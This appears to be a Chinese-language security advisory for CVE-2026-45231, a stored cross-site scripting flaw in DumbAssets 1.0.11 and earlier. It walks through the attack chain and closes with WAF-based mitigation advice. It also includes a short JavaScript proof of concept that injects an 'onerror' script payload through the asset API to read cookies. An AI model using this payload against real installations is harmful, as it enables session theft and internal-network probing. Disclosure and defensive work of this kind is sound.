CVE-2026-45231 CVSS 6.1 中危

CVE-2026-45231 DumbAssets存储型XSS漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45231

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

DumbAssets

漏洞概述

DumbAssets在1.0.11及之前版本中存在存储型XSS漏洞。由于资产字段（如名称、描述等）在服务端未进行清理，且客户端使用innerHTML渲染时未进行转义，攻击者可利用API注入恶意脚本。当用户查看资产列表时，脚本将被执行，若禁用CSP，攻击者可进一步利用脚本连接内部网络服务。

技术细节

该漏洞源于应用程序在处理用户输入时缺乏有效的消毒措施以及在输出时缺乏上下文感知的编码。攻击者可以通过资产API端点（POST/PUT）提交包含HTML或JavaScript代码的恶意载荷到name、description、modelNumber、serialNumber或tags等字段。由于服务端未对这些字段进行过滤，载荷被持久化存储在数据库中。当其他用户（特别是管理员）访问资产列表页面时，应用程序使用不安全的`innerHTML`方法直接将数据渲染到DOM中，导致载荷在受害者的浏览器上下文中执行。如果Content-Security-Policy（CSP）被禁用或配置不当，注入的脚本不仅可以窃取会话Cookie，还能向内部网络服务发起请求，导致内网信息泄露。

攻击链分析

STEP 1

1. 载荷注入

攻击者向DumbAssets的API端点发送特制的HTTP请求，在资产字段（如description）中插入恶意JavaScript代码。

STEP 2

2. 数据存储

服务器端未对输入数据进行有效过滤，将恶意载荷持久化存储在数据库中。

STEP 3

3. 页面渲染

受害用户访问资产列表页面，前端应用使用innerHTML将包含恶意代码的数据渲染到页面中。

STEP 4

4. 脚本执行

受害者的浏览器解析HTML并执行注入的脚本，攻击者可借此窃取敏感信息或扫描内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-45231
// Target: DumbAssets <= 1.0.11
// Description: Injecting a script payload into the asset description field.

// Step 1: Send a malicious request to create/update an asset
fetch('http://target-domain/api/assets', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    // Authorization headers might be required depending on configuration
  },
  body: JSON.stringify({
    name: 'Malicious Asset',
    description: '<img src=x onerror=alert(document.cookie)>',
    modelNumber: 'Model-1',
    serialNumber: 'SN-123',
    tags: ['poc']
  })
})
.then(response => response.json())
.then(data => console.log('Payload injected:', data));

// Step 2: Trigger
// When a user views the asset list, the alert() will execute.

影响范围

DumbAssets <= 1.0.11

防御指南

临时缓解措施

在未升级版本前，建议部署Web应用防火墙（WAF）规则以拦截包含常见XSS攻击特征（如<script>、onerror=等）的请求包，并限制通过API直接创建资产权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表